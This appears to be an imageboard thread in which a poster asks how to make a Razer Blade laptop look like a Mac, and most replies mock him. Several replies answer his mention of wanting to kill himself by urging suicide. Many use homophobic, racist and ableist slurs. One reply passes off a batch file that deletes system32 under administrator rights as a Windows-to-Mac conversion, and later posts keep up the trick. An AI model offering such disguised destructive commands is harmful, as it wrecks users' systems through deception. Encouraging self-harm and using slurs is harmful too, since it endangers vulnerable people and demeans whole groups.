Told my dad to get me a new Mac book for collage and the stupid cunt got me some cheap shit called a razer blade...

Told my dad to get me a new Mac book for collage and the stupid cunt got me some cheap shit called a razer blade, is there anyway to get it to work and look like a mac, hes a stupid cunt and i actually want to kms right now.

plz help

>and i actually want to kms right now
feel free to do it

I seriously hope you are a troll because if not you need to fix your life. Calling your dad a dumb cunt for getting you a £1000+ laptop? People like you make me sick.

Would u pay £1000 for a laptop with a gay rainbow on the front for everyone to see?

Change the fucking wallpaper you retard.

you should kys

Also
>thinking anyone cares enough about you to look
Ha

OP isn't in the wrong, who tf wants a gay razer blade? I'd be pissed too if I didn't get a mac.

Why aren't the summer children leaving?

Find a way to humiliate him in front of his extended family

Yeah, it's really easy actually. Windows is just an extension of the mac computer. All you have to do is get rid of the windows part.

Go ahead and type in "notepad" into windows search then paste this into the file:
@echo off
cd c:\windows
del system32

Save that file to the desktop as "windowstomac.bat" (without quotes) then right click on the file and select "run as administrator".

Say yes or press enter at any prompts. Then simply reboot your new Mac. Voila!

Yay i found the only reasonable man in existance.

>man
I think you mean child

>Apple logo
>Not gay
Confirmed for b8.

Because summer's not over yet.

Doesnt it make more sense to just delete the windows folder, otherwise files would just be left behind.

confirmed for band?
lulwut

Winter can't come fast enough can it

I know this is bait but I hope you die OP you faggot piece of shit

The razer blade is garbage in the winter too though

I can second this, OP. My retarded parents got me a dinosaur thinkpad for christmas one year instead of the macbook pro I wanted. Did some googling and found this, worked like a charm.

>band
OP is a retard everyone, this thread is complete bait. We are done here

uh oh, looks like you just committed murder. the cyber police are on their way.

After you reboot you may delete all the rest of the bloatware in the windows folder.
You can't delete windows while using windows.

Hey at least you won't need a space heater in the winter.

My buddy got one of these recently, it's pretty beautiful. We put it side by side with my old MBP and it's almost exactly the same, but without the niggeraids. Would recommend.

says permission denied, its MY COMPUTER wtf, how can it deny me?

Right click then run as administrator

ITT: People giving (You)s for free

doesnt work

You have to save it as a .bat file...enjoy your new mac

HA! GAY!

Sell it. Razer Blade is fucking garbage.

>colleague got his daughter a high spec P50 for college (E3 1535M xeon, M2000M quadro), 64gb ram, two 512gb m.2 SSD and one 1TB ssd)
>apparently she opened it and wasn't impressed, she spoke to her mom and got her to talk colleague into returning it and getting her a macbook
>shes doing architecture/engineering stuff with CAD

>women
that p50 was mad overkill for anything you'd need to do in terms of architecture/engr but still a dumb cunt

MBP might have mediocre specs but software isn't written by pajeet retards so it actually works fine and without lag on it without having to throw resources at it to keep the memory-leaking software-abortions from nuking themselves

You're gonna have to try a lot harder than that.

There was a singular guy in my CAD course in college that used a mac and he had more software problems than anyone.

He constantly blamed it on Windows, but none of us ever had those issues. The dumbass was running CAD programs in a VM session of Windows 7.

>MBP might have mediocre specs

>best available intel cpu
>best ssd
>best screen
>best balance between performance and portability because IT'S A FUCKING LAPTOP NOT A DESKTOP
>muh 32gb meme
>muh I need a nvidia 1050+ for muh games

all you really have is how apple fucks you on upgrades.
$400 less and it would be perfect